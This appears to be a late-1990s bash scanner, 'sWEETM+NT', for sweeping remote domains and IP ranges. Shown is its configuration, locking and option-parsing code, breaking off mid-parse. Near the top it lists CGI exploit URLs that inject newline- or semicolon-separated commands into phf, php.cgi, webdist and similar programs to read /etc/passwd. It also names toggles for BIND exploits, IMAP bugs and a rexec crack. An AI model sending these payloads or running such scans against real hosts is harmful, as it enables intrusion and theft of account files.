#
#                   sWEETM+NT - sWEET mAGiC + iNTERFACE
#                         rEM0TE nETW0RK sCAN T00L
#
#                       by \sPIRIT\ -s0ftpr0ject 99-
#

# Release string shown in the start-up banner.
sweetVER=1.2.0
# Directory name for bundled helper binaries (not referenced in this part
# of the file).
extrabinPATH=bin

# ------------------------ CGI BUGS EXPLOIT DATA ------------------------
# Each value is a URL path plus query string aimed at one CGI program under
# /cgi-bin/. Most embed an encoded newline (%0a / %0A) or a ';' followed by
# a command that reads /etc/passwd, i.e. they test whether the CGI hands its
# query to a shell unfiltered. Presumably used by the cgi-bin scan
# (parameter 'c'); the requests themselves are issued outside this part of
# the file.
# For defenders: any of these strings in a web server access log is a sign
# of automated probing; the durable fix is to remove these sample CGI
# programs rather than to filter on the exact strings.
testcgi='/cgi-bin/test-cgi?*'
nphtestcgi='/cgi-bin/nph-test-cgi?*'
phf='/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd'
php='/cgi-bin/php.cgi?/etc/passwd'
webdist='/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd'
campas='/cgi-bin/campas?%0a/bin/cat%0a/etc/passwd%0a'
query='/cgi-bin/query?%0A/bin/cat%20/etc/passwd'
phfyp='/cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20/etc/passwd'

# code zone -----------------------------------------------------------------

# Wipe the terminal and ring the bell before anything is printed.
clear
echo -e "\a"

# Start-up banner: tool name with version, author line, contact address and
# a spacer line holding a single blank.
printf '%s\n' \
    "sWEETM+NT v$sweetVER - sWEET mAGIC + iNTERFACE" \
    "rEM0TE nETW0RK sCAN T00L - \sPIRIT\ -s0ftpr0ject 99-" \
    "sUPP0RT/iNF0 eMAiL aDDRESS: immagika@usa.net" \
    " "

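# Session lock: only one sweetmint start-up may run in this directory at a
# time. The lock file is created under noclobber so that "does it exist?"
# and "create it" are one atomic step; a separate existence test followed
# by touch lets two invocations started together both pass the test.
# The subshell keeps noclobber from leaking into the rest of the script.
if ! ( set -o noclobber; : > sweetmint.LOCK ) 2> /dev/null
  then
      if [ -e sweetmint.LOCK ]
        then
            echo "* sWEETM+NT is initializing another scan session"
            echo "* Please re-run in a few seconds"
            echo " "
            exit 1
      fi

      # The lock could not be created for some other reason (for example
      # an unwritable directory): say so and carry on without a lock, as a
      # failed touch would have done.
      echo "* WARNING: could not create sweetmint.LOCK" >&2
fi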

# Local host details for the session header: kernel name and release,
# node name, and the current date.
sysINFO=$(uname -s -r)
sysNAME=$(uname -n)
timeINFO=$(date)

# User information: take the first parenthesised name from the id output
# (the text between the first '(' and the following ')').
# Word splitting on the unquoted expansion collapses runs of whitespace
# before cut sees the line.
userTMP=$(id)
userID=$(echo $userTMP | cut -d'(' --fields=2 | cut -d')' --fields=1)

# The privilege class is decided by account name only.
case "$userID" in
  root) userTYPE='root' ;;
  *)    userTYPE='user' ;;
esac

printf '%s\n' \
    "Launched by user: $userID" \
    "Your machine is $sysNAME running $sysINFO" \
    "Local time: $timeINFO" \
    " "

# parse config .smintrc and eventually create it

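if [ ! -e .smintrc ]
  then
       echo "* Config file not found - creating a new one with defaults."

       # The new config is assembled in a scratch file next to .smintrc and
       # renamed into place only once every entry has been written. If a
       # required tool is missing the scratch file is removed, so an aborted
       # first run never leaves behind an empty or partial .smintrc that a
       # later run would load as if it were complete.
       smintrcNEW=".smintrc.new.$$"
       : > "$smintrcNEW"

       # Print the absolute path of tool $1, or nothing when it is not an
       # executable found through PATH.
       smint_locate() {
           local found
           found=$(command -v "$1" 2> /dev/null) || return 0
           case "$found" in
             /*) echo "$found" ;;
           esac
       }

       # Record required tool $1 (located at $2). When $2 is empty: explain,
       # discard the scratch config, release the session lock and exit 1.
       smint_required() {
           if [ -z "$2" ]
             then
                 echo "The <$1> command was not found in the path"
                 echo "If it is already on the system please add the path"
                 echo "to the PATH env variable, otherwise install it"
                 rm -f -- "$smintrcNEW"
                 rm sweetmint.LOCK
                 exit 1
           fi
           echo "$2" >> "$smintrcNEW"
       }

       # Record optional tool $1 (located at $2). When $2 is empty the entry
       # "<tool> not found" is written instead, and any further arguments are
       # printed as the lines explaining which feature is lost. With no
       # further arguments the miss is recorded silently.
       smint_optional() {
           local toolNAME=$1 toolPATH=$2 lostLINE
           shift 2
           if [ -n "$toolPATH" ]
             then
                 echo "$toolPATH" >> "$smintrcNEW"
                 return 0
           fi
           if [ $# -gt 0 ]
             then
                 echo "* The <$toolNAME> command was not found in the path,"
                 for lostLINE in "$@"
                   do
                       echo "$lostLINE"
                   done
                 echo " "
           fi
           echo "$toolNAME not found" >> "$smintrcNEW"
       }

       uniqPATH=$(smint_locate uniq)
       nslookupPATH=$(smint_locate nslookup)
       sortPATH=$(smint_locate sort)
       cutPATH=$(smint_locate cut)
       showmountPATH=$(smint_locate showmount)
       nohupPATH=$(smint_locate nohup)
       fingerPATH=$(smint_locate finger)
       lynxPATH=$(smint_locate lynx)
       tarPATH=$(smint_locate tar)
       gzipPATH=$(smint_locate gzip)
       pingPATH=$(smint_locate ping)
       rusersPATH=$(smint_locate rusers)
       traceroutePATH=$(smint_locate traceroute)

       # The order of the entries below is the on-disk format of .smintrc.
       smint_required uniq "$uniqPATH"
       smint_optional nslookup "$nslookupPATH" \
           "* the host name resolver (parameter 'n') won't work"
       smint_required sort "$sortPATH"
       smint_required cut "$cutPATH"
       smint_optional showmount "$showmountPATH" \
           "* the exportable dirs listing (parameter 'f') won't work"
       smint_required nohup "$nohupPATH"
       smint_optional finger "$fingerPATH" \
           "* the finger info collection (parameter 'F') won't work"
       smint_optional lynx "$lynxPATH" \
           "* the cgi-bin scan (parameter 'c') won't work"
       smint_optional tar "$tarPATH" \
           "* the [-tar] command line parameter won't work"
       smint_optional gzip "$gzipPATH" \
           "* the [-tar] command line parameter won't work"
       smint_optional ping "$pingPATH" \
           "* the alive hosts scan (parameter 'a')" \
           "* and the broadcast scan (parameter 't') won't work"
       smint_optional rusers "$rusersPATH" \
           "* the rexec crack (parameter 'R') won't work"

       # traceroute isn't needed for now... don't tease the user
       smint_optional traceroute "$traceroutePATH"

       # default scan parameters -> -full -disable:nas
       defaultPARAMETERS='-full -disable:nas'
       echo "params $defaultPARAMETERS" >> "$smintrcNEW"

       # Publish the finished config in one step.
       mv -- "$smintrcNEW" .smintrc
fi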

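echo -n "* Loading config file... "

# Print the config line recorded for tool $1, read from file $2
# (default: .smintrc). A line belongs to the tool when its last path
# component is exactly the tool name, or when it is the "<tool> not found"
# marker. Matching the bare name anywhere in the line would also pick up
# other tools' entries whose directory happens to contain it (for example
# "tar" inside /opt/star/bin/sort).
smintrc_entry() {
    grep -E "(^|/)$1( not found)?\$" "${2:-.smintrc}"
}

uniqPATH=$(smintrc_entry uniq)
nslookupPATH=$(smintrc_entry nslookup)
sortPATH=$(smintrc_entry sort)
cutPATH=$(smintrc_entry cut)
showmountPATH=$(smintrc_entry showmount)
nohupPATH=$(smintrc_entry nohup)
fingerPATH=$(smintrc_entry finger)
lynxPATH=$(smintrc_entry lynx)
tarPATH=$(smintrc_entry tar)
gzipPATH=$(smintrc_entry gzip)
pingPATH=$(smintrc_entry ping)
rusersPATH=$(smintrc_entry rusers)
traceroutePATH=$(smintrc_entry traceroute)

# The parameters line is "params <options>"; drop the 7-character prefix.
defaultPARAMETERS=$(grep '^params ' .smintrc | "$cutPATH" --characters=8-)

echo "done."

echo "* Parameters loaded from config are: $defaultPARAMETERS"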

# ---- PARSING COMMAND LINE ----

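# Print the command line help shared by every usage error.
smint_usage() {
    echo " "
    echo "Use: sweetmint [-file:<file>][-range:<range>][-single:<host>]"
    echo "               [-resume]<domain>[:<childs>] [-tar] [options]"
    echo " "
    echo "<domain> is the domain or subdomain you want to scan."
    echo "When [-tar] is specified, a .tar.gz archive will be created with"
    echo "the results."
    echo "When [options] are omitted, parameters loaded from config are used."
    echo "The [-file:<file>] will scan the hosts contained in <file>"
    echo "The [-range:<range>] will scan the specified range of IP's"
    echo "The [-single:<host>] will scan only the given host."
    echo "The [-resume:]<domain> will resume an aborted scan of <domain>."
    echo "The [:<childs>] parameter specifies the number of scan processes that"
    echo "will be working simultaneously on the list. If none is specified, one"
    echo "process will do all the work (slow!) (NOTE! NOT WORKING YET)"
    echo "Any parameter supplied will override the loaded parameters."
    echo "Parameters are CASE SENSITIVE."
    echo "Note that you MUST supply the command line parameters in the order"
    echo "shown above, otherwise the program won't parse them correctly."
    echo "Please read the file sweetmint.README for full informations"
    echo " "
    echo "Example: sweetmint microsux.com:3 -tar -full -disable:nas"
    echo " "
}

# Print error line $1 followed by the help text, release the session lock
# and leave with status 1.
smint_usage_error() {
    echo "$1"
    smint_usage
    rm sweetmint.LOCK
    exit 1
}

# Between one and four arguments are accepted.
if [ $# -gt 4 ]
  then
      smint_usage_error "* ERROR: too many parameters on command line, maximum is 4"
fi

if [ $# -lt 1 ]
  then
      smint_usage_error "* ERROR: too few parameters on command line, minimum is <domain>"
fi

# The whole command line as one space-joined string; the scan target is
# its first space-separated word. Taken with parameter expansion so that
# neither echo option parsing nor the configured cut path is involved.
commandLINE="$*"
scanDOMAIN=${commandLINE%% *}

# The first word must be a target, not an option. Only words that start
# like an option are refused, so a domain whose name merely contains
# "enable" or "disable" is still accepted.
case "$scanDOMAIN" in
  -tar|-full|-enable*|-disable*)
      smint_usage_error "* ERROR: <domain> to scan not specified on command line."
      ;;
esac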

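# Print numeric octet $1 limited to the interval 1..254.
smint_clamp_octet() {
    if [ "$1" -lt 1 ]
      then
          echo 1
    elif [ "$1" -gt 254 ]
      then
          echo 254
    else
        echo "$1"
    fi
}

# Succeed when $1 is a well-formed octet specification: "*", a decimal
# number of one to three digits, or two such numbers joined by one "-".
smint_valid_octet() {
    local octetRE='^[0-9]{1,3}(-[0-9]{1,3})?$'
    [[ $1 == '*' || $1 =~ $octetRE ]]
}

# Expand the octet specification held in variable range$1 ($1 is ONE, TWO,
# THREE or FOUR) into range$1start and range$1end:
#   "*"    -> 1 and 254
#   "a-b"  -> a and b, each limited to 1..254
#   "n"    -> n limited to 1..254 for both; range$1 is updated to that value
smint_expand_octet() {
    local specVAR="range$1" octetSPEC lowOCTET highOCTET
    octetSPEC=${!specVAR}
    case "$octetSPEC" in
      '*')
          lowOCTET=1
          highOCTET=254
          ;;
      *-*)
          lowOCTET=$(smint_clamp_octet "${octetSPEC%%-*}")
          highOCTET=$(smint_clamp_octet "${octetSPEC#*-}")
          ;;
      *)
          lowOCTET=$(smint_clamp_octet "$octetSPEC")
          highOCTET=$lowOCTET
          printf -v "$specVAR" '%s' "$lowOCTET"
          ;;
    esac
    printf -v "${specVAR}start" '%s' "$lowOCTET"
    printf -v "${specVAR}end" '%s' "$highOCTET"
}

# Decide the scan mode from the first command line word. The value after
# the mode keyword is the text between the first and the second ':'; it is
# taken with parameter expansion, so no scratch file with a fixed name is
# written to (and appended onto) in the working directory.
targetARG=${scanDOMAIN#*:}
targetARG=${targetARG%%:*}

case "$scanDOMAIN" in
  *resume:*)
      scanRESUME=$targetARG
      echo "* Resuming aborted scan for domain [$scanRESUME]"
      tmpdir="$scanRESUME.tmp"

      # A resume needs the <domain>.done file of the interrupted run.
      if [ ! -e "$scanRESUME.done" ]
        then
            echo "* ERROR: could not find resume informations."
            if [ -e "$scanRESUME.resume" ]
              then
                  rm -- "$scanRESUME.resume"
            fi

            rm sweetmint.LOCK
            exit 1
      fi
      ;;

  *single:*)
      scanSINGLE=$targetARG
      echo "* Single host to scan is [$scanSINGLE]"
      tmpdir="$scanSINGLE.tmp"
      ;;

  *file:*)
      scanFILE=$targetARG
      echo "* Hosts to scan taken from file [$scanFILE]"
      tmpdir="$scanFILE.tmp"

      isONfilelist='on'

      if [ ! -e "$scanFILE" ]
        then
            echo "* ERROR: could not find file containing hosts to scan."
            rm sweetmint.LOCK
            exit 1
      fi
      ;;

  *range:*)
      scanRANGEtmp=$targetARG
      scanRANGE="$RANDOM.range"
      tmpdir="$scanRANGE.tmp"

      isONrange='on'

      # Split on dots; anything after a fourth octet lands in rangeEXTRA.
      IFS=. read -r rangeONE rangeTWO rangeTHREE rangeFOUR rangeEXTRA <<< "$scanRANGEtmp"

      if [ -z "$rangeONE" ] || [ -z "$rangeTWO" ] || [ -z "$rangeTHREE" ] || [ -z "$rangeFOUR" ] || [ -n "$rangeEXTRA" ]
        then
            echo "* ERROR: the given IPs range is not in dotted quad format (ex: 1.2.3.4)"
            rm sweetmint.LOCK
            exit 1
      fi

      # Every octet is checked as a whole before any numeric comparison, so
      # text such as "a1" is refused here instead of reaching the integer
      # tests. No unquoted bracket pattern is handed to grep, so file names
      # in the working directory cannot alter the check.
      for octetNAME in ONE TWO THREE FOUR
        do
            octetVAR="range$octetNAME"
            if ! smint_valid_octet "${!octetVAR}"
              then
                  echo "* ERROR: the given IPs range contains invalid characters"
                  rm sweetmint.LOCK
                  exit 1
            fi
        done

      for octetNAME in ONE TWO THREE FOUR
        do
            smint_expand_octet "$octetNAME"
        done

      echo "* Scanning sequentially IPs in range [$rangeONEstart.$rangeTWOstart.$rangeTHREEstart.$rangeFOURstart -> $rangeONEend.$rangeTWOend.$rangeTHREEend.$rangeFOURend]"
      ;;

  *)
      echo "* Domain to scan is [$scanDOMAIN]"
      tmpdir="$scanDOMAIN.tmp"
      ;;
esac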

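# Give this run an empty working directory. $tmpdir is built from the
# target named on the command line, so it is quoted and passed after "--":
# a name with glob characters or a leading "-" must reach rm and mkdir as
# exactly one path and never as a pattern or an option.
if [ ! -d "$tmpdir" ]
  then
      echo -n "* Creating temporary directory for this run... "
      mkdir -- "$tmpdir"
      echo "done"

  else
      # A directory left by an earlier run on the same target is wiped.
      echo -n "* Cleaning up temporary directory for this run... "
      rm -rf -- "$tmpdir"
      mkdir -- "$tmpdir"
      echo "done"
fi

echo "* Temporary directory is set to $tmpdir/"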

# Work out whether [-tar] was given and which scan options, if any, were
# supplied on the command line to replace the ones loaded from the config.

# Fields "1-" select the whole line, so this leaves commandLINE as it was.
commandLINE=`echo "$commandLINE" | $cutPATH -d' ' --fields=1-`
# Everything after the first space. With no space at all cut prints the
# line unchanged, so tempPARMS then equals commandLINE.
tempPARMS=`echo "$commandLINE" | $cutPATH -d' ' --fields=2-`

# "grep -v tar" succeeds only if the line does NOT contain "tar"; negated,
# this branch runs when "tar" appears anywhere on the command line.
# NOTE(review): that includes a target whose name contains "tar", not just
# the -tar switch - confirm whether this is intended.
if ( ! echo "$commandLINE" | grep -v tar >/dev/null )
  then 
     tar_results='on' 

     # Drop the first positional parameter; from here on $2 and $3 are what
     # the caller passed as the third and fourth argument.
     shift 1             

     # NOTE(review): after the shift $3 is the caller's fourth argument, so
     # "<domain> -tar <option>" (three arguments) takes the else branch and
     # the single option is discarded - looks unintended, confirm.
     if [ $3 ]
       then
            # Strip the leading word (presumably "-tar") from the options.
            tempPARMS=`echo "$tempPARMS" | $cutPATH -d' ' --fields=2-`
       else
            tempPARMS=''
     fi
  else
     tar_results='off'
fi

# $2 is tested unquoted: the test is true when it is set and non-empty.
if [ $2 ]
  then
      # Same negated "grep -v" form as above: the options replace the
      # defaults only when tempPARMS contains a "-".
      if ( ! echo "$tempPARMS" | grep -v "-">/dev/null )
        then
             defaultPARAMETERS=$tempPARMS
             echo "* Default parameters override due to command line options"
      fi

fi

echo "* Using parameters $defaultPARAMETERS"

# --------------------------------------------------------------
# settings of parameters
# --------------------------------------------------------------

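echo "* Tasks to perform according to parameters:"

# Split the active parameter string into its first word and its second and
# third words. Word splitting on the unquoted $defaultPARAMETERS collapses
# runs of whitespace before cut splits on single spaces.
firstPARAM=$(echo $defaultPARAMETERS | "$cutPATH" -d' ' --fields=-1)
secondPARAM=$(echo $defaultPARAMETERS | "$cutPATH" -d' ' --fields=2-3)

# With a single parameter there is no space for cut to split on, and it
# prints the whole line for fields 2-3 as well; treat that as "no second
# parameter". Both operands are quoted so that an empty first parameter is
# compared as an empty string rather than making the test itself fail.
if [ "$secondPARAM" = "$firstPARAM" ]
    then
        secondPARAM=''
fi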

if ( echo "$firstPARAM" | grep "full" > /dev/null ) && ( echo "$secondPARAM" | grep "enable" > /dev/null ) 
  then
      resolve_host='on'
      alive_host='on'
      remote_fs='on'
      cgi_scan='on'
      wingate_scan='on'
      netbios_scan='on'
      rpc_info='on'
      bind_ver='on'
      bind_exploit='on'
      get_finger='on'
      nis_map='on'
      banner_dump='on'
      rusers_scan='on'
      bcast_scan='on'
      use_plugins='on'
      imap_bug='on'
      smtppop3_bugs='on'


elif ( echo "$firstPARAM" | grep "enable" > /dev/null ) && ( echo "$secondPARAM" | grep "full" > /dev/null )
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'
 
elif ( echo "$firstPARAM" | grep "full" > /dev/null ) && ( echo "$secondPARAM" | grep "disable" > /dev/null )
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'

        tempVERIFY=`echo "$secondPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi


elif ( echo "$firstPARAM" | grep "disable" > /dev/null ) && ( echo "$secondPARAM" | grep "full" > /dev/null )
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'

        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi

elif ( echo "$firstPARAM" | grep "enable" > /dev/null ) && ( echo "$secondPARAM" | grep "disable" > /dev/null )
    then
        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=9-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='on'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='on'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='on'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='on'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='on'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='on'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='on'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='on'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='on'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='on'
        fi

        tempVERIFY=`echo "$secondPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi

elif ( echo "$firstPARAM" | grep "disable" > /dev/null ) && ( echo "$secondPARAM" | grep "enable" > /dev/null )
    then
        tempVERIFY=`echo "$secondPARAM" | $cutPATH --characters=9-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='on'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='on'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='on'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='on'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='on'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='on'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='on'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='on'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='on'
        fi

        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi

elif ( echo "$firstPARAM" | grep "full" > /dev/null ) && [ -z $secondPARAM ]
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'

elif ( echo "$firstPARAM" | grep "enable" > /dev/null ) && [ -z $secondPARAM ]
    then
        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=9-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='on'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='on'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='on'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='on'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='on'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='on'
        fi

